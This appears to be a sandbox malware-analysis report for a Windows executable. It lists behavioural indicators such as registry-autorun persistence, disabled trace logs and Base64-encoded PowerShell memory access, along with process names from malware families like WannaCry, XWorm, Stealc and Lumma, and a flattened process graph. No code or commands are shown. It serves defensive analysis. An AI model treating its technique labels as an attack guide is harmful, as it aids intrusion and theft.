      • Vector-fixer-v1.4.2.exe (PID: 23524)
      • cvtres.exe (PID: 13028)
      • Axam.exe (PID: 22656)
      • brbotnet.exe (PID: 17668)
      • IcarusLite-v1.1.13-win.exe (PID: 22824)
      • DowOnline.Installer.exe (PID: 11080)
      • haozip.100021.exe (PID: 12740)
      • mvc3.exe (PID: 7572)
      • Serials_Checker.exe (PID: 12488)
      • Axam.exe (PID: 4116)
      • teleport-assist-windows.exe (PID: 24604)
      • csc.exe (PID: 24540)
      • darts-gif.exe (PID: 8512)
      • TianSys(XP%E4%B8%93%E7%94%A8).exe (PID: 16884)
      • cqsj.exe (PID: 16152)
      • cvtres.exe (PID: 25460)
      • dxwebsetup.exe (PID: 18212)
      • Axam.exe (PID: 3100)
      • Vector-fixer-v1.4.2.exe (PID: 24108)
      • bypass.exe (PID: 25216)
      • Axam.exe (PID: 12604)
      • alphaTweaks.exe (PID: 10592)
      • 7zG.exe (PID: 26004)
      • black.exe (PID: 26308)
      • Axam.exe (PID: 21160)
      • Axam.exe (PID: 27576)
      • PrivacyPolicy.exe (PID: 19912)
      • Axam.exe (PID: 27264)
      • Axam.exe (PID: 25856)
      • PrivacyPolicy.tmp (PID: 19896)
      • Axam.exe (PID: 27336)
      • csc.exe (PID: 27432)
      • QiMiaoSetup.4.0.1.7.exe (PID: 16168)
      • QiMiaoSetup.4.0.1.7.tmp (PID: 22504)
      • cvtres.exe (PID: 11684)
      • Axam.exe (PID: 21548)
      • Axam.exe (PID: 28572)
      • Axam.exe (PID: 2988)
      • IMG001.exe (PID: 21232)
      • ChromeUpdate.exe (PID: 20368)
      • Axam.exe (PID: 19872)
      • main1.exe (PID: 29364)
      • main1.exe (PID: 29356)
      • main1.exe (PID: 29372)
      • DRIVEapplet.exe (PID: 21680)
      • lol.exe (PID: 17576)
      • Axam.exe (PID: 29260)
      • Axam.exe (PID: 28848)
      • Axam.exe (PID: 20708)
      • Axam.exe (PID: 21520)
      • Axam.exe (PID: 29016)
      • Axam.exe (PID: 18852)
      • Axam.exe (PID: 27464)
      • PLD06B.tmp (PID: 5696)
      • Axam.exe (PID: 29492)
      • Axam.exe (PID: 29900)
      • Axam.exe (PID: 24420)
      • Stub.exe (PID: 21192)
      • RedX_Setup.exe (PID: 26440)
      • msiexec.exe (PID: 29068)
      • cd4.exe (PID: 1652)
      • Axam.exe (PID: 31656)
      • Axam.exe (PID: 31360)
      • Axam.exe (PID: 31336)
      • pfntjejghjsdkr.exe (PID: 17760)
      • rundll32.exe (PID: 32796)
      • Axam.exe (PID: 33764)
      • Axam.exe (PID: 16300)
      • Axam.exe (PID: 29320)
      • Axam.exe (PID: 10304)
      • snetcfg.exe (PID: 5956)
      • rundll32.exe (PID: 5940)
      • Axam.exe (PID: 24256)
      • cabal.exe (PID: 14524)
      • IniEditor.exe (PID: 18832)
      • Stub.exe (PID: 31024)
      • Axam.exe (PID: 30332)
      • 7z.exe (PID: 33432)
    • Reads product name

      • bot_x64.exe (PID: 508)
      • L7XH7UR9695U.exe (PID: 14104)
      • jqqvLru0VAiH3z.exe (PID: 17652)
      • X空间.exe (PID: 23068)
    • Creates files or folders in the user directory

      • bot_x64.exe (PID: 508)
      • Taskmgr.exe (PID: 7876)
      • UniversalBrowser.exe (PID: 8592)
      • v38438.exe (PID: 8468)
      • he.exe (PID: 7196)
      • Client.exe (PID: 10284)
      • Axam.a.exe (PID: 10244)
      • Amus.exe (PID: 10812)
      • 3yjehc7m.exe (PID: 12404)
      • explorer.exe (PID: 13080)
      • Pjibf.exe (PID: 8340)
      • CryptoLocker.exe (PID: 12936)
      • 37cqsj.exe (PID: 14052)
      • n743.exe (PID: 8800)
      • 2.exe (PID: 16308)
      • msiexec.exe (PID: 8928)
      • NP6lceA4ayWl.exe (PID: 16292)
      • explorer.exe (PID: 4696)
      • hAvav2N7QWPr.exe (PID: 16164)
      • namu864.exe (PID: 16600)
      • yx_dts.exe (PID: 19084)
      • q8348.exe (PID: 18124)
      • ShellHost.exe (PID: 2736)
      • ksv.exe (PID: 16932)
      • snd16061.exe (PID: 11732)
      • assignment.exe (PID: 21224)
      • 444.exe (PID: 21096)
      • Fast%20Download.exe (PID: 21056)
      • %C3%83%C2%A5%C3%82%C2%A5%C3%82%C2%87%C3%83%C2%A5%C3%82%C2%A6%C3%82%C2%99%C3%83%25...~311~...%EF%BF%BD%C3%82%C2%A8_2_10004379.exe (PID: 13308)
      • mvc3.exe (PID: 7572)
      • PPTV(pplive)_forap_1084_9993.exe (PID: 14132)
      • 123123.exe (PID: 17928)
      • msiexec.exe (PID: 22832)
      • bmw_v1.7.exe (PID: 16888)
      • cqsj.exe (PID: 16152)
      • pvp.exe (PID: 21856)
      • X空间.exe (PID: 23068)
      • bypass.exe (PID: 25216)
      • Decred.exe (PID: 15764)
      • Agentnov.exe (PID: 17112)
      • WannaCry.exe (PID: 14000)
      • rustdesk-1.2.3-2-x86_64.exe (PID: 15740)
      • Client-built.exe (PID: 15792)
      • System.exe (PID: 26804)
      • ljgksdtihd.exe (PID: 15704)
      • msiexec.exe (PID: 23808)
      • msiexec.exe (PID: 24520)
      • PLD06B.tmp (PID: 5696)
      • HaoZipLoader.exe (PID: 22608)
      • giftorder.exe (PID: 18132)
      • steamcmd.exe (PID: 25744)
      • IMG001.exe (PID: 21232)
      • Update.exe (PID: 26540)
      • Cloudy.exe (PID: 19428)
      • X空间.exe (PID: 33344)
    • Reads Environment values

      • bot_x64.exe (PID: 508)
      • v38438.exe (PID: 8468)
      • net_launcher.exe (PID: 5264)
      • Silentum_Spoofer.exe (PID: 2332)
      • Silentum_Spoofer.exe (PID: 7504)
      • CFXBypass.exe (PID: 7800)
      • CFXBypass.exe (PID: 4136)
      • TempSpoofer.exe (PID: 10724)
      • HorionInjector.exe (PID: 10732)
      • Pulsar-Client.exe (PID: 15776)
      • Silentum_Spoofer.exe (PID: 900)
      • L7XH7UR9695U.exe (PID: 14104)
      • q8348.exe (PID: 18124)
      • ShellHost.exe (PID: 2736)
      • BruterV3.1.exe (PID: 19640)
      • x64-setup.exe (PID: 17396)
      • jqqvLru0VAiH3z.exe (PID: 17652)
      • Phantom.exe (PID: 12580)
      • bypass.exe (PID: 25216)
      • alphaTweaks.exe (PID: 10592)
      • x834.exe (PID: 14060)
      • System.exe (PID: 26804)
      • System.exe (PID: 28384)
      • XClient.exe (PID: 19376)
      • bnkrigkawd.exe (PID: 26680)
      • X空间.exe (PID: 23068)
    • Reads the machine GUID from the registry

      • Silentum_Spoofer.exe (PID: 900)
      • Silentum_Spoofer.exe (PID: 2332)
      • Silentum_Spoofer.exe (PID: 7504)
      • net_launcher.exe (PID: 5264)
      • CFXBypass.exe (PID: 7800)
      • v38438.exe (PID: 8468)
      • CFXBypass.exe (PID: 4136)
      • beacon.exe (PID: 10704)
      • HorionInjector.exe (PID: 10732)
      • Amus.exe (PID: 10812)
      • LOIC.exe (PID: 12328)
      • LOIC.exe (PID: 12320)
      • Pjibf.exe (PID: 8340)
      • WannaCry.exe (PID: 14000)
      • 3yjehc7m.exe (PID: 12404)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 14848)
      • x834.exe (PID: 14060)
      • %C3%83%C2%A5%C3%82%C2%A5%C3%82%C2%87%C3%83%C2%A5%C3%82%C2%A6%C3%82%C2%99%C3%83%25...~311~...%EF%BF%BD%C3%82%C2%A8_2_10004379.exe (PID: 13308)
      • build.exe (PID: 14080)
      • Client-built.exe (PID: 15792)
      • Pulsar-Client.exe (PID: 15776)
      • Pinaview.tmp (PID: 15548)
      • EdmsLauncher.exe (PID: 15280)
      • BootstrapperNew.exe (PID: 13084)
      • BootstrapperNew.exe (PID: 14300)
      • msedge.exe (PID: 16628)
      • VC_redist.x64.exe (PID: 16856)
      • AddMeFast%20Bot.exe (PID: 16976)
      • n743.exe (PID: 8800)
      • L7XH7UR9695U.exe (PID: 14104)
      • jqqvLru0VAiH3z.exe (PID: 17652)
      • Phantom.exe (PID: 12580)
      • tlp.exe (PID: 15048)
      • mely.exe (PID: 18172)
      • q8348.exe (PID: 18124)
      • steamcmd.exe (PID: 17580)
      • Cloudy.exe (PID: 19428)
      • ShellHost.exe (PID: 2736)
      • conhost.exe (PID: 18116)
      • XClient.exe (PID: 19376)
      • Cloudy.exe (PID: 19384)
      • 5252.exe (PID: 19368)
      • TempSpoofer.exe (PID: 10724)
      • randll32.exe (PID: 18904)
      • Isass.exe (PID: 18436)
      • Install.exe (PID: 19628)
      • BruterV3.1.exe (PID: 19640)
      • imgs.exe (PID: 19696)
      • csc.exe (PID: 19788)
      • ntladlklthawd.exe (PID: 19736)
      • CHROMI~2.EXE (PID: 20216)
      • AppLaunch.exe (PID: 20180)
      • Steanings.exe (PID: 21708)
      • q-AMD64-Windows.exe (PID: 22352)
      • gallery-dl.exe (PID: 11192)
      • Steanings.exe (PID: 21700)
      • csc.exe (PID: 10520)
      • darts-wled.exe (PID: 23096)
      • darts-pixelit.exe (PID: 23252)
      • brbotnet.exe (PID: 17668)
      • cabal.exe (PID: 14524)
      • csc.exe (PID: 24540)
      • IcarusLite-v1.1.13-win.exe (PID: 24656)
      • bypass.exe (PID: 25216)
      • DRIVEapplet.exe (PID: 21680)
      • alphaTweaks.exe (PID: 10592)
      • cssgo.exe (PID: 26244)
      • taskmoder.exe (PID: 26396)
      • svchost.exe (PID: 27620)
      • riende.exe (PID: 14552)
      • ljgksdtihd.exe (PID: 15704)
      • csc.exe (PID: 27432)
      • System.exe (PID: 26804)
      • bnkrigkawd.exe (PID: 26680)
      • SharpHound.exe (PID: 15432)
      • FLMgrTray.exe (PID: 28408)
      • giftorder.exe (PID: 18132)
      • System.exe (PID: 28384)
      • steamcmd.exe (PID: 25744)
      • bmw_v1.7.exe (PID: 16888)
      • CagService.exe (PID: 25112)
      • services.exe (PID: 17676)
      • steamerx.exe (PID: 28176)
      • Ventrilo.exe (PID: 14120)
      • Pdf%20Reader.exe (PID: 13460)
      • HaoZipLoader.exe (PID: 22608)
      • Update.exe (PID: 26540)
      • 1210.exe (PID: 17192)
      • certinst.exe (PID: 28708)
      • Gui.exe (PID: 26328)
      • AppLaunch.exe (PID: 24876)
      • X空间.exe (PID: 23068)
      • VC_redist.x64.exe (PID: 23432)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 7008)
      • mshta.exe (PID: 2684)
      • mshta.exe (PID: 6148)
      • mshta.exe (PID: 5616)
      • mshta.exe (PID: 2524)
      • mshta.exe (PID: 9016)
      • mshta.exe (PID: 8980)
      • mshta.exe (PID: 12000)
      • mshta.exe (PID: 17456)
      • mshta.exe (PID: 25604)
      • mshta.exe (PID: 15672)
      • mshta.exe (PID: 27588)
    • Launching a file from a Registry key

      • UniversalBrowser.exe (PID: 8592)
      • he.exe (PID: 7196)
      • Loader.exe (PID: 10276)
      • Axam.a.exe (PID: 10244)
      • explorer.exe (PID: 13080)
      • WannaCry.exe (PID: 14000)
      • Amus.exe (PID: 10812)
      • rod_en_1.exe (PID: 14016)
      • rxd_en_1.exe (PID: 14068)
      • EDMSLauncherSetup.exe (PID: 12576)
      • rmd_en_1.exe (PID: 14112)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 14848)
      • n743.exe (PID: 8800)
      • Axam.exe (PID: 14780)
      • Loader.exe (PID: 14328)
      • NP6lceA4ayWl.exe (PID: 16292)
      • hAvav2N7QWPr.exe (PID: 16164)
      • Rsvp_invite%23903388.exe (PID: 11212)
      • Axam.exe (PID: 17348)
      • ChilledWindows.GUI.exe (PID: 19688)
      • imgs.exe (PID: 19696)
      • assignment.exe (PID: 21224)
      • reg.exe (PID: 22920)
      • Axam.exe (PID: 22656)
      • Serials_Checker.exe (PID: 12488)
      • reg.exe (PID: 24836)
      • Server.exe (PID: 18108)
      • dxwebsetup.exe (PID: 18212)
      • Axam.exe (PID: 4116)
      • Decred.exe (PID: 15764)
      • Axam.exe (PID: 12604)
      • Axam.exe (PID: 3100)
      • Axam.exe (PID: 21160)
      • Axam.exe (PID: 27576)
      • Axam.exe (PID: 25856)
      • Axam.exe (PID: 27264)
      • Axam.exe (PID: 27336)
      • Axam.exe (PID: 21548)
      • Axam.exe (PID: 29260)
      • Axam.exe (PID: 19872)
      • Axam.exe (PID: 28572)
      • Axam.exe (PID: 2988)
      • Axam.exe (PID: 20708)
      • Axam.exe (PID: 18852)
      • Axam.exe (PID: 28848)
      • Axam.exe (PID: 29016)
      • Axam.exe (PID: 21520)
      • Axam.exe (PID: 29900)
      • Axam.exe (PID: 24420)
      • Axam.exe (PID: 29492)
      • Axam.exe (PID: 31500)
      • Axam.exe (PID: 31336)
      • Axam.exe (PID: 31656)
      • Axam.exe (PID: 31360)
    • Launching a file from the Startup directory

      • UniversalBrowser.exe (PID: 8592)
      • he.exe (PID: 7196)
      • Axam.a.exe (PID: 10244)
      • explorer.exe (PID: 13080)
      • n743.exe (PID: 8800)
      • NP6lceA4ayWl.exe (PID: 16292)
      • hAvav2N7QWPr.exe (PID: 16164)
      • snd16061.exe (PID: 11732)
      • Fast%20Download.exe (PID: 21056)
      • Cloudy.exe (PID: 19428)
    • Disables trace logs

      • net_launcher.exe (PID: 5264)
      • Auo1.exe (PID: 10136)
      • CFXBypass.exe (PID: 4136)
      • Silentum_Spoofer.exe (PID: 7504)
      • HorionInjector.exe (PID: 10732)
      • TempSpoofer.exe (PID: 10724)
      • Phantom.exe (PID: 12580)
      • jqqvLru0VAiH3z.exe (PID: 17652)
      • Client-built.exe (PID: 15792)
      • bypass.exe (PID: 25216)
      • cssgo.exe (PID: 26244)
      • x834.exe (PID: 14060)
      • XClient.exe (PID: 19376)
      • taskmoder.exe (PID: 26396)
      • alphaTweaks.exe (PID: 10592)
      • Pdf%20Reader.exe (PID: 13460)
      • cabal.exe (PID: 14524)
    • Process checks computer location settings

      • bot_x64.exe (PID: 508)
      • Client.exe (PID: 10284)
      • yc.exe (PID: 11436)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 10880)
      • G7_Update.exe (PID: 14380)
      • namu864.exe (PID: 16600)
      • NAMUVPN32.exe (PID: 18180)
      • msedge.exe (PID: 16628)
      • cfxre.exe (PID: 13372)
      • Server.exe (PID: 18108)
      • namuvpnxp.exe (PID: 19348)
      • conhost.exe (PID: 18116)
      • %E6%A2%A6%E5%B9%BB%E9%AD%94%E7%95%8C%E7%94%B5%E8%84%91%E7%AB%AF.exe (PID: 11148)
      • Printer_Driver_SSL_support_v43.22.209.99.exe (PID: 18932)
      • downloader.exe (PID: 18264)
      • ZJQPPAJN.exe (PID: 19452)
      • CritScript.exe (PID: 14976)
      • FXServer.exe (PID: 17808)
      • IMG001.exe (PID: 21232)
      • assignment.exe (PID: 21224)
      • snd16061.exe (PID: 11732)
      • yx_dts.exe (PID: 19084)
      • imgs.exe (PID: 19696)
      • NanoCore_Portable.exe (PID: 12160)
      • 4.exe (PID: 12296)
      • 444.exe (PID: 21096)
      • lol.exe (PID: 17576)
      • %E6%83%85%E6%84%BF%E6%80%80%E6%97%A7.exe (PID: 8432)
      • Agentnov.exe (PID: 17112)
      • x834.exe (PID: 14060)
      • ZubovLekciya.exe (PID: 28084)
      • black.exe (PID: 26308)
      • X空间.exe (PID: 23068)
      • taskmoder.exe (PID: 26396)
    • PyInstaller has been detected (YARA)

      • main.exe (PID: 6884)
      • main.exe (PID: 8072)
    • The sample compiled with chinese language support

      • main.exe (PID: 8072)
      • yc.exe (PID: 11436)
      • 37cqsj.exe (PID: 14052)
      • Server.exe (PID: 18108)
      • %E6%A2%A6%E5%B9%BB%E9%AD%94%E7%95%8C%E7%94%B5%E8%84%91%E7%AB%AF.exe (PID: 11148)
      • yx_dts.exe (PID: 19084)
      • 4.exe (PID: 12296)
      • game.exe (PID: 10460)
      • PPTV(pplive)_forap_1084_9993.exe (PID: 14132)
      • haozip.100021.exe (PID: 12740)
    • Checks transactions between databases Windows and Oracle

      • 3yjehc7m.exe (PID: 12404)
    • Creating file in SysWOW64

      • 1.exe (PID: 14192)
      • 1.exe (PID: 14200)
    • Creates a software uninstall entry

      • EDMSLauncherSetup.exe (PID: 12576)
      • 37cqsj.exe (PID: 14052)
      • Rsvp_invite%23903388.exe (PID: 11212)
      • haozip.100021.exe (PID: 12740)
      • %C3%83%C2%A5%C3%82%C2%A5%C3%82%C2%87%C3%83%C2%A5%C3%82%C2%A6%C3%82%C2%99%C3%83%25...~311~...%EF%BF%BD%C3%82%C2%A8_2_10004379.exe (PID: 13308)
    • The sample compiled with turkish language support

      • main.exe (PID: 8072)
    • The sample compiled with korean language support

      • G7_Update.exe (PID: 14380)
      • main.exe (PID: 8072)
      • namuvpnxp.exe (PID: 19348)
      • sm.exe (PID: 19328)
    • Attempting to use instant messaging service

      • CFXBypass.exe (PID: 4136)
      • CFXBypass.exe (PID: 7800)
      • svchost.exe (PID: 2232)
      • L7XH7UR9695U.exe (PID: 14104)
      • mvc3.exe (PID: 7572)
      • firefox.exe (PID: 15664)
      • conhost.exe (PID: 20008)
      • firefox.exe (PID: 21496)
      • firefox.exe (PID: 7412)
      • curl.exe (PID: 23920)
      • chrome.exe (PID: 2164)
      • chrome.exe (PID: 21316)
      • chrome.exe (PID: 19784)
      • msedge.exe (PID: 20820)
      • msedge.exe (PID: 10840)
      • msedge.exe (PID: 14752)
      • ksv.exe (PID: 16932)
    • Changes the display of characters in the console

      • cmd.exe (PID: 14036)
      • cmd.exe (PID: 19484)
      • cmd.exe (PID: 15824)
      • cmd.exe (PID: 20372)
    • Compiled with Borland Delphi (YARA)

      • main.exe (PID: 8072)
    • Reads mouse settings

      • GMSSetupX86.exe (PID: 14956)
      • AutoIt3.exe (PID: 17604)
      • TianSys(XP%E4%B8%93%E7%94%A8).exe (PID: 16884)
    • Process checks whether UAC notifications are on

      • Isass.exe (PID: 13720)
      • gertgherthre.exe (PID: 3448)
      • Isass.exe (PID: 18436)
      • 52.exe (PID: 19400)
      • hbvTmbP46IIEeHP1.exe (PID: 12260)
      • taskhostw.exe (PID: 13948)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 9208)
    • Execution of CURL command

      • cmd.exe (PID: 15512)
      • cmd.exe (PID: 17288)
      • cmd.exe (PID: 23628)
      • cmd.exe (PID: 25068)
      • cmd.exe (PID: 26700)
      • cmd.exe (PID: 16148)
      • cmd.exe (PID: 2136)
      • cmd.exe (PID: 15724)
      • cmd.exe (PID: 33284)
    • DATTO has been detected

      • Rsvp_invite%23903388.exe (PID: 11212)
      • CagService.exe (PID: 25112)
    • Found Base64 encoded access to Marshal class via PowerShell (YARA)

      • main.exe (PID: 8072)
    • Found Base64 encoded access to environment variables via PowerShell (YARA)

      • main.exe (PID: 8072)
    • Found Base64 encoded access to BitConverter class via PowerShell (YARA)

      • main.exe (PID: 8072)
    • NirSoft software is detected

      • nircmd.exe (PID: 17424)
    • User-Agent configuration (POWERSHELL)

      • powershell.exe (PID: 9208)
    • Potential remote process memory interaction (Base64 Encoded 'VirtualAllocEx')

      • main.exe (PID: 8072)
    • Reads CPU info

      • L7XH7UR9695U.exe (PID: 14104)
      • nwinfo.exe (PID: 20920)
      • NdisInstaller3.2.32.1.exe (PID: 28004)
      • steamcmd.exe (PID: 25744)
    • The sample compiled with Italian language support

      • main.exe (PID: 8072)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • CFXBypass.exe (PID: 4136)
      • CFXBypass.exe (PID: 7800)
      • powershell.exe (PID: 10144)
      • powershell.exe (PID: 10904)
      • powershell.exe (PID: 14148)
      • powershell.exe (PID: 22928)
    • Found Base64 encoded network access via PowerShell (YARA)

      • Taskmgr.exe (PID: 7876)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 10912)
      • powershell.exe (PID: 10740)
      • powershell.exe (PID: 10092)
      • powershell.exe (PID: 10076)
      • powershell.exe (PID: 10864)
      • powershell.exe (PID: 28324)
    • Application launched itself

      • cmd.exe (PID: 14972)
      • cmd.exe (PID: 19296)
      • cmd.exe (PID: 12500)
      • cmd.exe (PID: 18960)
      • cmd.exe (PID: 14036)
    • Uses Task Scheduler to autorun other applications (AUTOMATE)

      • q8348.exe (PID: 18124)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 11404)
      • powershell.exe (PID: 10084)
      • powershell.exe (PID: 10092)
      • powershell.exe (PID: 12492)
      • powershell.exe (PID: 11428)
      • powershell.exe (PID: 1972)
    • The sample compiled with japanese language support

      • sm.exe (PID: 19328)
    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 10084)
    • The sample compiled with polish language support

      • main.exe (PID: 8072)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 10740)
      • powershell.exe (PID: 12540)
      • powershell.exe (PID: 28324)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 10740)
    • Checks operating system version

      • Isass.exe (PID: 18436)
    • SQLite executable

      • NanoCore_Portable.exe (PID: 12160)
    • Manual execution by a user

      • powershell.exe (PID: 22808)
      • nslookup.exe (PID: 22816)
      • cmd.exe (PID: 22380)
      • powershell.exe (PID: 17452)
      • cmd.exe (PID: 18784)
      • powershell.exe (PID: 10768)
    • Converts byte array into ASCII string (POWERSHELL)

      • powershell.exe (PID: 10904)
    • Attempting to connect via WebSocket

      • EmmetPROD.exe (PID: 21048)
    • The executable file from the user directory is run by the Powershell process

      • Axam.exe (PID: 4116)
    • There is functionality for taking screenshot (YARA)

      • he.exe (PID: 7196)
    • Changes the registry key values via Powershell

      • nslookup.exe (PID: 22816)
    • ACTION1 has been detected

      • msiexec.exe (PID: 8928)
    • Starts MODE.COM to configure console settings

      • mode.com (PID: 27536)
      • mode.com (PID: 28676)
      • mode.com (PID: 31864)
    • Drops encrypted VBS script (Microsoft Script Encoder)

      • Agentnov.exe (PID: 17112)
      • ZubovLekciya.exe (PID: 28084)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • powershell.exe (PID: 1972)
    • Failed to connect to remote server (POWERSHELL)

      • powershell.exe (PID: 1972)
    • RUSTDESK has been detected

      • X空间.exe (PID: 33344)
    • Reads Windows Product ID

      • X空间.exe (PID: 23068)
    • CONNECTWISE has been detected

      • msiexec.exe (PID: 22464)
    • RDPWRAP has been detected

      • RDPWInst.exe (PID: 23476)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:06:19 18:59:12+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.43
CodeSize: 178688
InitializedDataSize: 154624
UninitializedDataSize: -
EntryPoint: 0xc380
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows command line
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
1 083
Monitored processes
926
Malicious processes
123
Suspicious processes
137

Behavior graph

Click at the process to see the details
start main.exe conhost.exe no specs #GENERIC main.exe cmd.exe schtasks.exe no specs cmd.exe no specs #CRYPTOWALL taskmgr.exe no specs bot_x64.exe silentum_spoofer.exe silentum_spoofer.exe silentum_spoofer.exe vnc.exe no specs mshta.exe no specs net_launcher.exe conhost.exe no specs conhost.exe no specs mshta.exe no specs mshta.exe no specs mshta.exe no specs #XWORM he.exe cfxbypass.exe cfxbypass.exe nk.exe payload.exe mshta.exe no specs powershell.exe no specs pjibf.exe conhost.exe no specs wscript.exe no specs wscript.exe no specs cmd.exe no specs #XWORM hey.exe v38438.exe #XWORM violet.exe conhost.exe no specs #GENERIC universalbrowser.exe wscript.exe no specs qbix01.exe pro_payload.exe mshta.exe no specs powershell.exe txmclygo.exe mshta.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs #NJRAT n743.exe pardufrigi_installer_1.0.p1.exe powershell.exe no specs winvnc.exe no specs powershell.exe powershell.exe powershell.exe no specs cmd.exe no specs regedit.exe no specs auo1.exe powershell.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs clipaid-pro.exe no specs conhost.exe no specs THREAT powershell.exe no specs bexitor%20installer.exe #GENERIC axam.a.exe powershell.exe loader.exe #XENORAT client.exe conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs bugsoft.exe no specs cmd.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs beacon.exe anap.a.exe no specs tempspoofer.exe horioninjector.exe no specs powershell.exe THREAT powershell.exe no specs prolin.exe #GENERIC amus.exe rickroll.exe no specs powershell.exe no specs %d0%a4%d0%be%d1%80%d0%bc%d0%b0%203%d0%9e%d0%a8%d0%91%d0%a0.exe conhost.exe no specs powershell.exe no specs powershell.exe no specs dajoke2.exe no specs 2.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs pardufrigi_installer_1.0.p1.tmp powershell.exe no specs wxworkmultiopen.exe no specs msiexec.exe brontok.exe no specs conhost.exe no specs wxworkmultiopen.exe no specs win.exe no specs cummersmg.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs powershell.exe no specs powershell.exe yc.exe pe2shc.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs cmd.exe no specs outlook.exe rsvp_invite%23903388.exe runtimebroker.exe no specs net.exe no specs cryptowall.exe no specs loic.exe no specs loic.exe no specs conhost.exe no specs keepon.exe no specs 01.exe powershell.exe cmd.exe no specs #ADWARE %e7%bd%91%e6%98%93%e4%ba%91%e9%9f%b3%e4%b9%90.exe powershell.exe no specs #STEALC build1.exe rustme.exe no specs pieletjf_vm.exe no specs edmslaunchersetup.exe conhost.exe no specs conhost.exe no specs conhost.exe no specs conhost.exe no specs #CRYPTOWALL explorer.exe net1.exe no specs netsh.exe no specs 3yjehc7m.exe pk.exe no specs conhost.exe no specs slui.exe conhost.exe no specs #XWORM werfault.exe #GENERIC powershell.exe #WANNACRY wannacry.exe better.exe no specs rod_en_1.exe tomcat8.exe no specs cmd.exe no specs 37cqsj.exe x834.exe rxd_en_1.exe #METASTEALER build.exe pdfconverter_p2w154-zx-666.exe test.exe #GOTOHTTP l7xh7ur9695u.exe rmd_en_1.exe ventrilo.exe pptv(pplive)_forap_1084_9993.exe THREAT powershell.exe no specs powershell.exe no specs 1.exe 1.exe conhost.exe no specs svchost.exe wxworkmultiopen.exe no specs conhost.exe no specs conhost.exe no specs loader.exe cryptolocker.exe no specs pieletjf.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs %c3%83%c2%a5%c3%82%c2%a5%c3%82%c2%87%c3%83%c2%a5%c3%82%c2%a6%c3%82%c2%99%c3%83%25...~311~...%ef%bf%bd%c3%82%c2%a8_2_10004379.exe conhost.exe no specs g7_update.exe %e5%88%92%e5%ad%a6%e5%8f%b7v2--%e6%9e%81%e9%80%9f%e7%89%88.exe wxworkmultiopen.exe no specs conhost.exe no specs conhost.exe no specs axam.exe {34184a33-0407-212e-3300-09040709e2c2}.exe gmssetupx86.exe no specs cmd.exe no specs pinaview.exe CMSTPLUA msiexec.exe no specs conhost.exe no specs conhost.exe no specs rmo_se~2.exe edmslauncher.exe no specs rexcel~1.exe no specs setup.exe conhost.exe no specs cmd.exe no specs {34184a33-0407-212e-3300-09040709e2c2}.exe no specs cmd.exe no specs pinaview.tmp chcp.com no specs decred.exe pulsar-client.exe #QUASAR client-built.exe ksv.exe v4343.exe no specs is-lldth.tmp schtasks.exe no specs conhost.exe no specs conhost.exe no specs cqsj.exe s287.exe #STEALC 1.exe no specs THREAT powershell.exe no specs installer_%e6%99%ba%e8%83%bd%e7%bf%bb%e8%af%91%e5%ae%98_r1.7.9.exe no specs np6lcea4aywl.exe 2.exe is-tsijd.tmp isass.exe wxworkmultiopen.exe no specs netsh.exe no specs conhost.exe no specs windowsïµí³ö÷¶¯·àóù.exe no specs mshta.exe no specs bootstrappernew.exe no specs bootstrappernew.exe no specs havav2n7qwpr.exe msiexec.exe no specs namu864.exe msedge.exe no specs setup.exe no specs curl.exe 32.exe no specs vc_redist.x64.exe no specs bmw_v1.7.exe #STEALER ksv.exe conhost.exe no specs addmefast%20bot.exe no specs #GOTOHTTP g64.exe no specs conhost.exe no specs #GOTOHTTP g64.exe no specs 1210.exe rustmedebyg.exe no specs #LUMMA bsg.exe #GOTOHTTP g64.exe axam.exe conhost.exe no specs conhost.exe no specs #CLICKFIX x64-setup.exe #NESHTA cfxre.exe windows.x64.silent.cpu.exe no specs doitallmain.exe no specs msedge.exe chrome.exe firefox.exe #VIDAR svchost.exe phantom.exe tlp.exe cmd.exe no specs nircmd.exe no specs taskkill.exe no specs conhost.exe no specs msiexec.exe no specs lol.exe no specs steamcmd.exe lol11.exe autoit3.exe no specs pst.exe no specs conhost.exe no specs jqqvlru0vaih3z.exe lol1.exe brbotnet.exe no specs services.exe no specs namuvpnx2.exe no specs 